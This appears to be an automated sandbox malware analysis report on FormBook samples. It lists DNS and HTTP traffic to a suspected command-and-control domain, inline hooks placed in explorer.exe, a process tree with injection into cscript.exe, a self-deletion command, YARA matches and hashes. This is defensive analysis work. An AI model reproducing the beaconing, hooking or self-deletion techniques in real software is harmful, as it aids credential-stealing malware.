                                                      Aug 3, 2021 19:49:12.558231115 CEST53605798.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:20.701026917 CEST5018353192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:20.737951040 CEST53501838.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:50.337585926 CEST6153153192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:50.372936964 CEST53615318.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:49:51.853117943 CEST4922853192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:49:51.887586117 CEST53492288.8.8.8192.168.2.4
                                                      Aug 3, 2021 19:50:15.298187971 CEST5979453192.168.2.48.8.8.8
                                                      Aug 3, 2021 19:50:15.339657068 CEST53597948.8.8.8192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Aug 3, 2021 19:50:15.298187971 CEST192.168.2.48.8.8.80x6317Standard query (0)www.comfsresidential.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Aug 3, 2021 19:50:15.339657068 CEST8.8.8.8192.168.2.40x6317No error (0)www.comfsresidential.com185.53.178.50A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • www.comfsresidential.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.449760185.53.178.5080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Aug 3, 2021 19:50:15.382633924 CEST6717OUTGET /cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h HTTP/1.1
                                                      Host: www.comfsresidential.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Aug 3, 2021 19:50:15.399422884 CEST6717INHTTP/1.1 403 Forbidden
                                                      Server: nginx
                                                      Date: Tue, 03 Aug 2021 17:50:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 146
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      PeekMessageAINLINEexplorer.exe
                                                      PeekMessageWINLINEexplorer.exe
                                                      GetMessageWINLINEexplorer.exe
                                                      GetMessageAINLINEexplorer.exe

                                                      Processes

                                                      Process: explorer.exe, Module: user32.dll
                                                      Function NameHook TypeNew Data
                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF
                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xEF

                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: New_1007572_021.exe PID: 6688 Parent PID: 5932

                                                      General

                                                      Start time:19:48:16
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\Desktop\New_1007572_021.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\Desktop\New_1007572_021.exe'
                                                      Imagebase:0x800000
                                                      File size:455168 bytes
                                                      MD5 hash:41137FD61B9CC0D92225C91660A5902C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Analysis Process: New_1007572_021.exe PID: 6280 Parent PID: 6688

                                                      General

                                                      Start time:19:48:53
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
                                                      Imagebase:0xb50000
                                                      File size:455168 bytes
                                                      MD5 hash:41137FD61B9CC0D92225C91660A5902C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 28%, ReversingLabs
                                                      Reputation:low

                                                      Analysis Process: FB_5908.tmp.exe PID: 6340 Parent PID: 6280

                                                      General

                                                      Start time:19:48:55
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
                                                      Imagebase:0x400000
                                                      File size:3072 bytes
                                                      MD5 hash:74BAFB3E707C7B0C63938AC200F99C7F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 5%, Metadefender, Browse
                                                      • Detection: 2%, ReversingLabs
                                                      Reputation:moderate

                                                      Analysis Process: FB_5E87.tmp.exe PID: 6344 Parent PID: 6280

                                                      General

                                                      Start time:19:48:55
                                                      Start date:03/08/2021
                                                      Path:C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
                                                      Imagebase:0x1080000
                                                      File size:186368 bytes
                                                      MD5 hash:48ECE2CA39A9EAE7FCED7418CF071D46
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 49%, Metadefender, Browse
                                                      • Detection: 86%, ReversingLabs
                                                      Reputation:low

                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 6344

                                                      General

                                                      Start time:19:48:57
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0x7ff6fee60000
                                                      File size:3933184 bytes
                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: cscript.exe PID: 6000 Parent PID: 3424

                                                      General

                                                      Start time:19:49:31
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\cscript.exe
                                                      Imagebase:0xe0000
                                                      File size:143360 bytes
                                                      MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Analysis Process: cmd.exe PID: 6872 Parent PID: 6000

                                                      General

                                                      Start time:19:49:34
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Analysis Process: conhost.exe PID: 6756 Parent PID: 6872

                                                      General

                                                      Start time:19:49:35
                                                      Start date:03/08/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff724c50000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >